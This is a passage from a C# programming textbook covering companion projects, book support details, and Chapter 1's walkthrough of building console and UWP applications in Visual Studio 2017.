ComplexNumbers
This project defines a new type that models
complex numbers and implements common
operators for this type.
Chapter 23
GraphDemo
This project generates and displays a complex
graph on a UWP form. It uses a single thread
to perform the calculations.
Parallel GraphDemo
This version of the GraphDemo project uses
the Parallel class to abstract out the process
of creating and managing tasks.
GraphDemo With
Cancellation
This project shows how to implement
cancellation to halt tasks in a controlled
manner before they have completed.
ParallelLoop
This application provides an example
showing when you should not use the
Parallel class to create and run tasks.
Chapter 24
GraphDemo
This is a version of the GraphDemo project
from Chapter 23 that uses the async keyword
and the await operator to perform the
calculations that generate the graph data
asynchronously.
PLINQ
This project shows some examples of using
PLINQ to query data by using parallel tasks.
CalculatePI
This project uses a statistical sampling
algorithm to calculate an approximation for
pi. It uses parallel tasks.
Chapter 25
Customers
This project implements a scalable user
interface that can adapt to different device
layouts and form factors. The user interface
applies XAML styling to change the fonts
and background image displayed by the
application.
Chapter 26
DataBinding
This is a version of the Customers project that
uses data binding to display customer
information retrieved from a data source in
the user interface. It also shows how to
implement the INotifyPropertyChanged
interface so that the user interface can update
customer information and send these changes
back to the data source.
ViewModel
This version of the Customers project
separates the user interface from the logic that
accesses the data source by implementing the
Model-View-ViewModel pattern.
Cortana
This project integrates the Customers app
with Cortana. A user can issue voice
commands to search for customers by name.
Chapter 27
Web Service
This solution includes a web application that
provides an ASP.NET Web API web service
that the Customers application uses to retrieve
customer data from a SQL Server database.
The web service uses an entity model created
with the Entity Framework to access the
database.
Errata and book support
We’ve made every effort to ensure the accuracy of this book and its
companion content. Any errors that have been reported since this book was
published are listed on our Microsoft Press site at:
https://aka.ms/VisCSharp9e/errata
If you find an error that is not already listed, you can report it to us
through the same page.
If you need additional support, email Microsoft Press Book Support at
[email protected].
Please note that product support for Microsoft software and hardware is
not offered through the previous addresses. For help with Microsoft software
or hardware, go to https://support.microsoft.com.
Stay in touch
Let’s keep the conversation going! We’re on Twitter:
http://twitter.com/MicrosoftPress
PART I
Introducing Microsoft Visual C#
and Microsoft Visual Studio 2017
This introductory part of the book covers the essentials of the C# language
and shows you how to get started building applications with Visual Studio
2017.
In Part I, you’ll learn how to create new projects in Visual Studio and how
to declare variables, use operators to create values, call methods, and write
many of the statements you need when implementing C# programs. You’ll
also learn how to handle exceptions and how to use the Visual Studio
debugger to step through your code and spot problems that prevent your
applications from working correctly.
CHAPTER 1
Welcome to C#
After completing this chapter, you will be able to:
Use the Microsoft Visual Studio 2017 programming environment.
Create a C# console application.
Explain the purpose of namespaces.
Create a simple graphical C# application.
This chapter introduces Visual Studio 2017, the programming environment
and toolset designed to help you build applications for Microsoft Windows.
Visual Studio 2017 is the ideal tool for writing C# code, and it provides many
features that you will learn about as you progress through this book. In this
chapter, you will use Visual Studio 2017 to build some simple C#
applications and get started on the path to building highly functional solutions
for Windows.
Beginning programming with the Visual Studio 2017
environment
Visual Studio 2017 is a tool-rich programming environment containing the
functionality that you need to create large or small C# projects running on
Windows. You can even construct projects that seamlessly combine modules
written in different programming languages, such as C++, Visual Basic, and
F#. In the first exercise, you will open the Visual Studio 2017 programming
environment and learn how to create a console application.
Note A console application is an application that runs in a Command
Prompt window instead of providing a graphical user interface (GUI).
Create a console application in Visual Studio 2017
1. On the Windows taskbar, click Start, type Visual Studio 2017, and then
press Enter. Alternatively, you can click the Visual Studio 2017 icon on
the Start menu.
Visual Studio 2017 starts and displays the Start page, similar to the
following. (Your Start page might be different, depending on the edition
of Visual Studio 2017 you are using.)
2. On the File menu, point to New, and then click Project.
The New Project dialog box opens. This dialog box lists the templates
that you can use as a starting point for building an application. The
dialog box categorizes templates according to the programming
language you are using and the type of application.
3. In the left pane, expand the Installed node (if it is not already expanded),
and then click Visual C#. In the middle pane, verify that the combo box
at the top of the pane displays .NET Framework 4.6.1, and then click
Console App (.NET Framework).
Note Make sure that you select Console App (.NET Framework)
and not Console App (.NET Core). You use the .NET Core
template for building portable applications that can also run on
other operating systems, such as Linux. However, .NET Core
applications do not provide the range of features available to the
complete .NET Framework.
4. In the Location box, type C:\Users\YourName\Documents\Microsoft Press\VCSBS\Chapter 1. Replace the text YourName in this path with your Windows username.
Note To avoid repetition and save space, throughout the rest of this
book I will refer to the path C:\Users\YourName\Documents
simply as your Documents folder.
Tip If the folder you specify does not exist, Visual Studio 2017
creates it for you.
5. In the Name box, type TestHello (type over the existing name,
ConsoleApplication1).
6. Ensure that the Create Directory For Solution check box is selected and
that the Add To Source Control check box is clear, and then click OK.
Visual Studio creates the project by using the Console Application
template. Visual Studio then displays the starter code for the project, like this:
The menu bar at the top of the screen provides access to the features
you’ll use in the programming environment. You can use the keyboard or
mouse to access the menus and commands, exactly as you can in all
Windows-based programs. The toolbar is located beneath the menu bar. It
provides button shortcuts to run the most frequently used commands.
The Code and Text Editor window, occupying the main part of the screen,
displays the contents of source files. In a multifile project, when you edit
more than one file, each source file has its own tab labeled with the name of
the source file. You can click the tab to bring the named source file to the
foreground in the Code and Text Editor window.
The Solution Explorer pane appears on the right side of the IDE, adjacent
to the Code and Text Editor window:
Solution Explorer displays the names of the files associated with the
project, among other items. You can also double-click a file name in Solution
Explorer to bring that source file to the foreground in the Code and Text
Editor window.
Before writing any code, examine the files listed in Solution Explorer,
which Visual Studio 2017 has created as part of your project:
Solution ‘TestHello’ This is the top-level solution file. Each
application contains a single solution file. A solution can contain one
or more projects, and Visual Studio 2017 creates the solution file to
help organize these projects. If you use File Explorer to look at your
Documents\Microsoft Press\VCSBS\Chapter 1\TestHello folder, you’ll
see that the actual name of this file is TestHello.sln.
TestHello This is the C# project file. Each project file references one
or more files containing the source code and other artifacts for the
project, such as graphics images. You must write all the source code in
a single project in the same programming language. In File Explorer,
this file is actually called TestHello.csproj, and it is stored in the
\Microsoft Press\VCSBS\Chapter 1\TestHello\TestHello folder in your
Documents folder.
Properties This is a folder in the TestHello project. If you expand it
(click the arrow next to Properties), you will see that it contains a file
called AssemblyInfo.cs. AssemblyInfo.cs is a special file that you can
use to add attributes to a program, such as the name of the author, the
date the program was written, and so on. You can specify additional
attributes to modify the way in which the program runs. Explaining how to use these attributes in depth is beyond the scope of this book, but a brief illustrative sketch appears after this list.
References This folder contains references to libraries of compiled
code that your application can use. When your C# code is compiled, it
is converted into a library and given a unique name. In the Microsoft
.NET Framework, these libraries are called assemblies. Developers use
assemblies to package useful functionality that they have written so
that they can distribute it to other developers who might want to use
these features in their own applications. If you expand the References
folder, you will see the default set of references that Visual Studio
2017 adds to your project. These assemblies provide access to many of
the commonly used features of the .NET Framework and are provided
by Microsoft with Visual Studio 2017. You will learn about many of
these assemblies as you progress through the exercises in this book.
App.config This is the application configuration file. It is optional,
and it might not always be present. You can specify settings that your
application uses at run time to modify its behavior, such as the version
of the .NET Framework to use to run the application. You will learn
more about this file in later chapters of this book.
Program.cs This is a C# source file, and it is displayed in the Code
and Text Editor window when the project is first created. You will
write your code for the console application in this file. It also contains
some code that Visual Studio 2017 provides automatically, which you
will examine shortly.
Writing your first program
The Program.cs file defines a class called Program that contains a method
called Main. In C#, all executable code must be defined within a method, and
all methods must belong to a class or a struct. You will learn more about
classes in Chapter 7, “Creating and managing classes and objects,” and you
will learn about structs in Chapter 9, “Creating value types with enumerations
and structures.”
The Main method designates the program’s entry point. This method
should be defined in the manner specified in the Program class as a static
method; otherwise, the .NET Framework might not recognize it as the
starting point for your application when you run it. (You will look at methods
in detail in Chapter 3, “Writing methods and applying scope,” and Chapter 7
provides more information on static methods.)
Important C# is a case-sensitive language. You must spell Main with
an uppercase M.
In the following exercises, you write the code to display the message
“Hello World!” to the console window, build and run your Hello World
console application, and learn how namespaces are used to partition code
elements.
Write the code by using Microsoft IntelliSense
1. In the Code and Text Editor window displaying the Program.cs file,
place the cursor in the Main method, immediately after the opening
curly brace ( { ), and then press Enter to create a new line.
2. On the new line, type the word Console; this is the name of another
class provided by the assemblies referenced by your application. It
provides methods for displaying messages in the console window and
reading input from the keyboard.
As you type the letter C at the start of the word Console, an IntelliSense
list appears. This list contains all of the C# keywords and data types that
are valid in this context. You can either continue typing or scroll through
the list and double-click the Console item with the mouse. Alternatively,
after you have typed Cons, the IntelliSense list automatically homes in
on the Console item, and you can press the Tab or Enter key to select it.
Main should look like this:
static void Main(string[] args)
{
    Console
}
Note Console is a built-in class.
3. Type a period immediately following Console.
Another IntelliSense list appears, displaying the methods, properties,
and fields of the Console class.
4. Scroll down through the list, select WriteLine, and then press Enter.
Alternatively, you can continue typing the characters W, r, i, t, e, L until
WriteLine is selected, and then press Enter.
The IntelliSense list closes, and the word WriteLine is added to the
source file. Main should now look like this:
static void Main(string[] args)
{
    Console.WriteLine
}
5. Type ( and another IntelliSense tip will appear.
This tip displays the parameters that the WriteLine method can take. In
fact, WriteLine is an overloaded method, meaning that the Console class
contains more than one method named WriteLine—it provides 19
different versions of this method. You can use each version of the
WriteLine method to output different types of data. (Chapter 3 describes
overloaded methods in more detail.) Main should now look like this:
static void Main(string[] args)
{
    Console.WriteLine(
}
Tip You can click the up and down arrows in the tip to scroll
through the different overloads of WriteLine.
6. Type ); and Main should now look like this:
static void Main(string[] args)
{
    Console.WriteLine();
}
7. Move the cursor and type the string, “Hello World!” (including the
quotation marks) between the left and right parentheses following the
WriteLine method.
Main should now look like this:
static void Main(string[] args)
{
    Console.WriteLine("Hello World!");
}
Tip Get into the habit of typing matched character pairs, such as
parentheses—( and )—and curly brackets—{ and }—before filling in
their contents. It’s easy to forget the closing character if you wait until
after you’ve entered the contents.
IntelliSense icons
When you type a period after the name of a class, IntelliSense displays
the name of every member of that class. To the left of each member
name is an icon that depicts the type of member. Common icons and
their types include the following:
Method (discussed in Chapter 3)
Property (discussed in Chapter 15, “Implementing properties to access fields”)
Class (discussed in Chapter 7)
Struct (discussed in Chapter 9)
Enum (discussed in Chapter 9)
Extension method (discussed in Chapter 12, “Working with inheritance”)
Interface (discussed in Chapter 13, “Creating interfaces and defining abstract classes”)
Delegate (discussed in Chapter 17, “Introducing generics”)
Event (discussed in Chapter 17)
Namespace (discussed in the next section of this chapter)
You will also see other IntelliSense icons appear as you type code in
different contexts.
You will frequently see lines of code containing two forward slashes (//)
followed by ordinary text. These are comments, which are ignored by the
compiler but are very useful for developers because they help document what
a program is actually doing. Take, for instance, the following example:
Console.ReadLine(); // Wait for the user to press the Enter key
The compiler skips all text from the two slashes to the end of the line. You
can also add multiline comments that start with a forward slash followed by
an asterisk (/*). The compiler skips everything until it finds an asterisk
followed by a forward slash sequence (*/), which could be many lines further
down. You are actively encouraged to document your code with as many
meaningful comments as necessary.
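For example, a multiline comment together with a single-line comment might
look like this (a minimal sketch using the statements from this chapter):

/* This program displays a greeting in the console window
   and then waits for the user to press the Enter key. */
Console.WriteLine("Hello World!");
Console.ReadLine(); // Wait for the user to press the Enter key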
Build and run the console application
1. On the Build menu, click Build Solution.
This action compiles the C# code, resulting in a program that you can
run. The Output window appears below the Code and Text Editor
window.
Tip If the Output window does not appear, click Output on the
View menu to display it.
In the Output window, you should see messages similar to the following,
indicating how the program is being compiled:
1>------ Build started: Project: TestHello, Configuration: Debug Any CPU ------
1> TestHello -> C:\Users\John\Documents\Microsoft Press\Visual CSharp Step By Step\Chapter 1\TestHello\TestHello\bin\Debug\TestHello.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
If you have made any mistakes, they will be reported in the Error List
window. The following image shows what happens if you forget to type
the closing quotation marks after the text Hello World in the WriteLine
statement. Notice that a single mistake can sometimes cause multiple
compiler errors.
Tip To go directly to the line that caused the error, you can double-
click an item in the Error List window. You should also notice that
Visual Studio displays a wavy red line under any lines of code that
will not compile when you enter them.
If you have followed the previous instructions carefully, there should be
no errors or warnings, and the program should build successfully.
Tip There is no need to save the file explicitly before building
because the Build Solution command automatically saves it. An
asterisk after the file name in the tab above the Code and Text
Editor window indicates that the file has been changed since it was
last saved.
2. On the Debug menu, click Start Without Debugging.
A command window opens, and the program runs. The message “Hello
World!” appears. The program now waits for you to press any key, as
shown in the following graphic:
Note The “Press any key to continue” prompt is generated by
Visual Studio; you did not write any code to do this. If you run the
program by using the Start Debugging command on the Debug
menu, the application runs, but the command window closes
immediately without waiting for you to press a key.
3. Ensure that the command window displaying the program’s output has
the focus (meaning that it’s the window that’s currently active), and then
press Enter.
The command window closes, and you return to the Visual Studio 2017
programming environment.
4. In Solution Explorer, click the TestHello project (not the solution), and
then, on the Solution Explorer toolbar, click the Show All Files button.
Be aware that you might need to click the double-arrow button on the
right edge of the Solution Explorer toolbar to make this button appear.
Entries named bin and obj appear above the Program.cs file. These
entries correspond directly to folders named bin and obj in the project
folder (Microsoft Press\VCSBS\Chapter 1\TestHello\TestHello). Visual
Studio creates these folders when you build your application; they
contain the executable version of the program together with some other
files used to build and debug the application.
5. In Solution Explorer, expand the bin entry.
Another folder named Debug appears.
Note You might also see a folder named Release.
6. In Solution Explorer, expand the Debug folder.
Several more items appear, including a file named TestHello.exe. This is
the compiled program, which is the file that runs when you click Start
Without Debugging on the Debug menu. The other files contain
information that is used by Visual Studio 2017 if you run your program
in debug mode (when you click Start Debugging on the Debug menu).
Using namespaces
The example you have seen so far is a very small program. However, small
programs can soon grow into much bigger programs. As a program grows,
two issues arise. First, it is harder to understand and maintain big programs
than it is to understand and maintain smaller ones. Second, more code usually
means more classes, with more methods, requiring you to keep track of more
names. As the number of names increases, so does the likelihood of the
project build failing because two or more names clash. For example, you
might try to create two classes with the same name. The situation becomes
more complicated when a program references assemblies written by other
developers who have also used a variety of names.
In the past, programmers tried to solve the name-clashing problem by
prefixing names with some sort of qualifier (or set of qualifiers). Using
prefixes as qualifiers is not a good solution because it’s not scalable. Names
become longer, you spend less time writing software and more time typing
(there is a difference), and you spend too much time reading and rereading
incomprehensibly long names.
Namespaces help solve this problem by creating a container for items such
as classes. Two classes with the same name will not be confused with each
other if they live in different namespaces. You can create a class named
Greeting inside the namespace named TestHello by using the namespace
keyword like this:
namespace TestHello
{
    class Greeting
    {
        ...
    }
}
You can then refer to the Greeting class as TestHello.Greeting in your
programs. If another developer also creates a Greeting class in a different
namespace, such as NewNamespace, and you install the assembly that
contains this class on your computer, your programs will still work as
expected because they are using your TestHello.Greeting class. If you want to
refer to the other developer’s Greeting class, you must specify it as
NewNamespace.Greeting.
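For example, hypothetical code that uses both classes side by side might look
like this (a sketch, assuming both classes are available to your project):

TestHello.Greeting ourGreeting = new TestHello.Greeting();
NewNamespace.Greeting otherGreeting = new NewNamespace.Greeting();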
It is good practice to define all your classes in namespaces, and the Visual
Studio 2017 environment follows this recommendation by using the name of
your project as the top-level namespace. The .NET Framework class library
also adheres to this recommendation; every class in the .NET Framework
lives within a namespace. For example, the Console class lives within the
System namespace. This means that its full name is actually System.Console.
Of course, if you had to write the full name of a class every time you used
it, the situation would be no better than prefixing qualifiers or even just
naming the class with some globally unique name such as SystemConsole.
Fortunately, you can solve this problem with a using directive in your
programs. If you return to the TestHello program in Visual Studio 2017 and
look at the file Program.cs in the Code and Text Editor window, you will
notice the following lines at the top of the file:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
These lines are using directives. A using directive brings a namespace into
scope. In the subsequent code in the same file, you no longer need to
explicitly qualify objects with the namespace to which they belong. The five
namespaces shown contain classes that are used so often that Visual Studio
2017 automatically adds these using directives every time you create a new
project. You can add more using directives to the top of a source file if you
need to reference other namespaces.
Note You might notice that some of the using directives appear grayed-
out. These directives correspond to namespaces that are not currently
used by your application. If you don’t need them when you have
finished writing your code, you can safely delete them. However, if you
require items that are held in these namespaces later, you will have to
add the using directives back in again.
The following exercise demonstrates the concept of namespaces in more
depth.
Try longhand names
1. In the Code and Text Editor window displaying the Program.cs file,
comment out the first using directive at the top of the file, like this:
//using System;
2. On the Build menu, click Build Solution.
The build fails, and the Error List window displays the following error
message:
The name 'Console' does not exist in the current context.
3. In the Error List window, double-click the error message.
The identifier that caused the error is highlighted in the Program.cs
source file with a red squiggle.
4. In the Code and Text Editor window, edit the Main method to use the
fully qualified name System.Console.
Main should look like this:
static void Main(string[] args)
{
    System.Console.WriteLine("Hello World!");
}
Note When you type the period after System, IntelliSense displays
the names of all the items in the System namespace.
5. On the Build menu, click Build Solution.
The project should build successfully this time. If it doesn’t, ensure that
Main is exactly as it appears in the preceding code, and then try building
again.
6. Run the application to be sure that it still works by clicking Start
Without Debugging on the Debug menu.
7. When the program runs and displays “Hello World!” in the console
window, press Enter to return to Visual Studio 2017.
Namespaces and assemblies
A using directive simply brings the items in a namespace into scope and
frees you from having to fully qualify the names of classes in your code.
Classes are compiled into assemblies. An assembly is a file that usually
has the .dll file name extension, although strictly speaking, executable
programs with the .exe file name extension are also assemblies.
An assembly can contain many classes. The classes that the .NET
Framework class library includes, such as System.Console, are provided
in assemblies that are installed on your computer together with Visual
Studio. You will find that the .NET Framework class library contains
thousands of classes. If they were all held in the same assembly, the
assembly would be huge and difficult to maintain. (If Microsoft were to
update a single method in a single class, it would have to distribute the
entire class library to all developers!)
For this reason, the .NET Framework class library is split into a
number of assemblies, partitioned by the functions that they perform or
the technology that they implement. For example, a “core” assembly
(actually called mscorlib.dll) contains all the common classes, such as
System.Console, and other assemblies contain classes for manipulating
databases, accessing web services, building GUIs, and so on. If you
want to make use of a class in an assembly, you must add a reference to
that assembly to your project. You can then add using directives to your
code that bring the items in namespaces in that assembly into scope.
You should note that there is not necessarily a 1:1 equivalence
between an assembly and a namespace: A single assembly can contain
classes defined in many namespaces, and a single namespace can span
multiple assemblies. For example, the classes and items in the System
namespace are actually implemented by several assemblies, including
mscorlib.dll, System.dll, and System.Core.dll, among others. This all
sounds very confusing at first, but you will soon get used to it.
When
you use Visual Studio to create an application, the template you select
automatically includes references to the appropriate assemblies. For
example, in Solution Explorer for the TestHello project, expand the
References folder. You will see that a console application automatically
contains references to assemblies called Microsoft.CSharp, System,
System.Core, System.Data, System.Data.DataSetExtensions,
System.Net.Http, System.Xml, and System.Xml.Linq. You might be
surprised to see that mscorlib.dll is not included in this list. The reason
for this is that all .NET Framework applications must use this assembly
because it contains fundamental runtime functionality. The References
folder lists only the optional assemblies; you can add or remove
assemblies from this folder as necessary.
To add references for additional assemblies to a project, right-click
the References folder and then click Add Reference. You will perform
this task in later exercises. You can remove an assembly by right-
clicking the assembly in the References folder and then clicking
Remove.
Creating a graphical application
So far, you have used Visual Studio 2017 to create and run a basic console
application. The Visual Studio 2017 programming environment also contains
everything you need to create graphical applications for Windows 10. These
templates are referred to as Universal Windows Platform (UWP) apps
because they enable you to create apps that function on any device that runs
Windows, such as desktop computers, tablets, and phones. You can design
the user interface (UI) of a Windows application interactively. Visual Studio
2017 then generates the program statements to implement the user interface
you’ve designed.
Visual Studio 2017 provides you with two views of a graphical
application: the design view and the code view. You use the Code and Text
Editor window to modify and maintain the code and program logic for a
graphical application, and you use the Design View window to lay out your
UI. You can switch between the two views whenever you want.
In the following set of exercises, you’ll learn how to create a graphical
application by using Visual Studio 2017. This program displays a simple
form containing a text box where you can enter your name, and a button that,
when clicked, displays a personalized greeting in a message box.
If you want more information about the specifics of writing UWP apps,
the final few chapters in Part IV of this book provide more detail and
guidance.
Create a graphical application in Visual Studio 2017
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
The New Project dialog box opens.
3. In the left pane, expand the Installed node (if it is not already expanded),
expand Visual C#, and then click Windows Universal.
4. In the middle pane, click the Blank App (Universal Windows) icon.
5. Ensure that the Location field refers to the \Microsoft
Press\VCSBS\Chapter 1 folder in your Documents folder.
6. In the Name box, type Hello.
7. Ensure that the Create Directory For Solution check box is selected, and
then click OK.
8. At this point, you will be prompted with a dialog box asking you to
specify on which builds of Windows 10 your application is going to run.
Later builds of Windows 10 have more and newer features available.
Microsoft recommends that you always select the latest build of
Windows 10 as the target version, but if you are developing enterprise
applications that also need to run on older versions, select the oldest
version of Windows 10 that your users are running as the minimum version.
However, do not automatically select the oldest version of Windows 10
as this might restrict some of the functionality available to your
application:
If this is the first time that you have created a UWP application, you
might also be prompted to enable developer mode for Windows 10, and
the Windows 10 settings screen will appear. Select Developer Mode. A
dialog box will appear confirming that this is what you want to do, as it
bypasses some of the security features of Windows. Click Yes. Windows
will download and install the Developer Mode package, which provides
additional features for debugging UWP applications:
Note External apps that are not downloaded from the Windows Store
could potentially expose personal data and pose other security risks, but
it is necessary to enable Developer Mode if you are building and testing
your own custom applications.
9. Return to Visual Studio. After the app has been created, look in the
Solution Explorer pane.
Don’t be fooled by the name of the application template. Although it is
called Blank App, this template actually provides a number of files and
contains some code. For example, if you expand the MainPage.xaml
folder, you will find a C# file named MainPage.xaml.cs. This file is
where you add the initial code for the application.
10. In Solution Explorer, double-click MainPage.xaml.
This file contains the layout of the UI. The Design View window shows
two representations of this file:
Note XAML stands for eXtensible Application Markup Language,
which is the language that Universal Windows Platform
applications use to define the layout for the GUI of an application.
You will learn more about XAML as you progress through the
exercises in this book.
At the top is a graphical view depicting the screen of, by default, a
Surface Book. The lower pane contains a description of the contents of
this screen using XAML. XAML is an XML-like language used by
UWP applications to define the layout of a form and its contents. If you
have knowledge of XML, XAML should look familiar.
In the next exercise, you will use the Design View window to lay out the
UI for the application, and you will examine the XAML code that this
layout generates.
Tip Close the Output and Error List windows to provide more
space for displaying the Design View window.
Note Before going further, it is worth explaining some
terminology. In traditional Windows applications, the UI consists
of one or more windows, but in a Universal Windows Platform
app, the corresponding items are referred to as pages. For the sake
of clarity, I will simply refer to both items by using the blanket
term form. However, I will continue to use the word window to
refer to items in the Visual Studio 2017 IDE, such as the Design
View window.
In the following exercises, you will use the Design View window to add
three controls to the form displayed by your application. You will also
examine some of the C# code automatically generated by Visual Studio 2017
to implement these controls.
Create the user interface
1. Click the Toolbox tab that appears in the margin to the left of the form
in the Design View window.
The Toolbox appears and displays the various components and controls
that you can place on a form. By default, the General section of the
toolbox is selected, which doesn’t contain any controls (yet).
2. Expand the Common XAML Controls section.
This section displays a list of controls that most graphical applications
use.
Tip The All XAML Controls section displays a more extensive list
of controls.
3. In the Common XAML Controls section, click TextBlock, and then drag
the TextBlock control onto the form displayed in the Design View
window.
Tip Be sure that you select the TextBlock control and not the
TextBox control. If you accidentally place the wrong control on a
form, you can easily remove it by clicking the item on the form
and then pressing Delete.
A TextBlock control is added to the form (you will move it to its correct
location in a moment), and the Toolbox disappears from view.
Tip If you want the Toolbox to remain visible but not hide any part
of the form, at the right end of the Toolbox title bar, click the Auto
Hide button (it looks like a pin). The Toolbox is docked on the left
side of the Visual Studio 2017 window, and the Design View
window shrinks to accommodate it. (You might lose a lot of space
if you have a low-resolution screen.) Clicking the Auto Hide
button once more causes the Toolbox to disappear again.
4. The TextBlock control on the form is probably not exactly where you
want it. You can click and drag the controls you have added to a form to
reposition them. Using this technique, move the TextBlock control so
that it is positioned toward the upper-left corner of the form. (The exact
placement is not critical for this application.) Notice that you might need
to click away from the control and then click it again before you can
move it in the Design View window.
The XAML description of the form in the lower pane now includes the
TextBlock control, together with properties such as its location on the
form, governed by the Margin property, the default text displayed by
this control in the Text property, the alignment of text displayed by this
control as specified by the HorizontalAlignment and VerticalAlignment
properties, and whether text should wrap if it exceeds the width of the
control.
Your XAML code for the TextBlock will look similar to this (your
values for the Margin property might be slightly different, depending on
where you positioned the TextBlock control on the form):
<TextBlock HorizontalAlignment="Left" Margin="150,180,0,0"
Text="TextBlock"
TextWrapping="Wrap" VerticalAlignment="Top"/>
The XAML pane and the Design View window have a two-way
relationship with each other. You can edit the values in the XAML pane,
and the changes will be reflected in the Design View window. For
example, you can change the location of the TextBlock control by
modifying the values in the Margin property.
5. On the View menu, click Properties Window (it is the last item in the
menu).
If it was not already displayed, the Properties window appears at the
lower right of the screen, under the Solution Explorer pane. You can
specify the properties of controls by using the XAML pane under the
Design View window, but the Properties window provides a more
convenient way for you to modify the properties for items on a form, as
well as other items in a project.
The Properties window is context sensitive in that it displays the
properties for the currently selected item. If you click the form displayed
in the Design View window (outside the TextBlock control), you can see
that the Properties window displays the properties for a Grid element. If
you look at the XAML pane, you should see that the TextBlock control
is contained within a Grid element. All forms contain a Grid element
that controls the layout of displayed items; for example, you can define
tabular layouts by adding rows and columns to the Grid.
6. In the Design View window, click the TextBlock control. The Properties
window displays the properties for the TextBlock control again.
7. In the Properties window, expand the Text property of the TextBlock
control. Change the FontSize property to 20 pt and then press Enter.
This property is located next to the drop-down list box containing the
name of the font, which will show Segoe UI:
Note The suffix pt indicates that the font size is measured in
points, where 1 point is equal to 1/72 of an inch.
8. In the XAML pane below the Design View window, examine the text
that defines the TextBlock control. If you scroll to the end of the line,
you should see the text FontSize="26.667". This is an approximate
conversion of the font size from points to pixels (3 points is assumed to
be roughly 4 pixels, although a precise conversion would depend on
your screen size and resolution). Any changes that you make using the
Properties window are automatically reflected in the XAML definitions,
and vice versa.
Type over the value of the FontSize attribute in the XAML pane and
change it to 24. The font size of the text for the TextBlock control in the
Design View window and the Properties window changes.
9. In the Properties window, examine the other properties of the TextBlock
control. Feel free to experiment by changing them to see their effects.
Notice that as you change the values of properties, these properties are
added to the definition of the TextBlock control in the XAML pane.
Each control that you add to a form has a default set of property values,
and these values are not displayed in the XAML pane unless you change
them.
10. Change the value of the Text property of the TextBlock control from
TextBlock to Please enter your name. You can do this either by editing
the Text element in the XAML pane or by changing the value in the
Properties window (this property is located in the Common section in
the Properties window).
Notice that the text displayed in the TextBlock control in the Design
View window changes.
11. Click the form in the Design View window, and then display the
Toolbox again.
12. In the Toolbox, click and drag the TextBox control onto the form. Move
the TextBox control so that it is directly below the TextBlock control.
Tip When you drag a control on a form, alignment indicators
appear automatically. These give you a quick visual cue to ensure
that controls are lined up neatly. You can also manually edit the
Margin property in the XAML pane to set the left-hand margin to
the same value as that of the TextBlock control.
13. In the Design View window, place the mouse over the right edge of the
TextBox control. The mouse pointer should change to a double-headed
arrow, indicating that you can resize the control. Drag the right edge of
the TextBox control until it is aligned with the right edge of the
TextBlock control above.
14. While the TextBox control is selected, at the top of the Properties
window, change the value of the Name property from textBox to
userName, as illustrated here:
Note You will learn more about naming conventions for controls
and variables in Chapter 2, “Working with variables, operators,
and expressions.”
15. Display the Toolbox again, and then click and drag a Button control onto
the form. Place the Button control to the right of the TextBox control on
the form so that the bottom of the button is aligned horizontally with the
bottom of the text box.
16. Using the Properties window, change the Name property of the Button
control to OK and change the Content property (in the Common section)
from Button to OK, and then press Enter. Verify that the caption of the
Button control on the form changes to display the text OK.
The form should now look similar to the following figure:
Note The drop-down menu in the upper-left corner of the Design
View window enables you to view how your form will render on
different screen sizes and resolutions. In this example, the default
view of a 13.5-inch Surface Book with a 3000 x 2000 resolution is
selected. To the right of the drop-down menu, two buttons enable
you to switch between portrait view and landscape view. The
projects used in subsequent chapters will use a 13.3-inch Desktop
view as the design surface, but you can keep the Surface Book
form factor for this exercise.
17. On the Build menu, click Build Solution, and then verify that the project
builds successfully.
18. Ensure that the Debug Target drop-down list is set to Local Machine as
shown below. (It might default to Device and attempt to connect to a
Windows phone device, and the build will probably fail). Then, on the
Debug menu, click Start Debugging.
The application should run and display your form. The form looks like
this:
Note When you run a Universal Windows Platform app in debug
mode, a debug toolbar appears near the top of the form. You can
use this toolbar to track how the user is navigating through the
form and monitor how the contents of the controls on the form
change. You can ignore this menu for now; click the double bar at
the bottom of the toolbar to minimize it.
In the text box, you can overtype the existing text with your name, and
then click OK, but nothing happens yet. You need to add some code to
indicate what should happen when the user clicks the OK button, which
is what you will do next.
19. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
Note You can also click the Close button (the X in the upper-right
corner of the form) to close the form, stop debugging, and return to
Visual Studio.
You have managed to create a graphical application without writing a
single line of C# code. It does not do much yet (you will have to write some
code soon), but Visual Studio 2017 actually generates a lot of code for you
that handles routine tasks that all graphical applications must perform, such
as starting up and displaying a window. Before adding your own code to the
application, it helps to have an understanding of what Visual Studio has
produced for you. The following section describes these automatically
generated artifacts.
Examining the Universal Windows Platform app
In Solution Explorer, expand the MainPage.xaml node. The file
MainPage.xaml.cs appears; double-click this file. The following code for the
form is displayed in the Code and Text Editor window:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices.WindowsRuntime;
using Windows.Foundation;
using Windows.Foundation.Collections;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Controls.Primitives;
using Windows.UI.Xaml.Data;
using Windows.UI.Xaml.Input;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Navigation;

// The Blank Page item template is documented at
// http://go.microsoft.com/fwlink/?LinkId=402352&clcid=0x409

namespace Hello
{
    /// <summary>
    /// An empty page that can be used on its own or navigated to within a Frame.
    /// </summary>
    public sealed partial class MainPage : Page
    {
        public MainPage()
        {
            this.InitializeComponent();
        }
    }
}
In addition to a good number of using directives bringing into scope some
namespaces that most UWP apps use, the file contains the definition of a
class called MainPage but not much else. There is a little bit of code for the
MainPage class known as a constructor that calls a method named
InitializeComponent. A constructor is a special method with the same name
as the class. It runs when an instance of the class is created and can contain
code to initialize the instance. You will learn about constructors in Chapter 7.
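As a minimal sketch (not the generated code itself), a class with a
constructor that initializes an instance might look like this:

class Greeter
{
    private string message;

    // The constructor has the same name as the class and runs
    // when an instance of the class is created.
    public Greeter()
    {
        this.message = "Hello";
    }
}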
The class actually contains a lot more code than the few lines shown in the
MainPage.xaml.cs file, but much of it is generated automatically based on the
XAML description of the form and is hidden from you. This hidden code
performs operations such as creating and displaying the form and creating
and positioning the various controls on the form.
Tip You can also display the C# code file for a page in a UWP app by
clicking Code on the View menu when the Design View window is
displayed.
At this point, you might be wondering where the Main method is and how
the form gets displayed when the application runs. Remember that in a
console application Main defines the point at which the program starts. A
graphical application is slightly different.
In Solution Explorer, you should notice another source file called
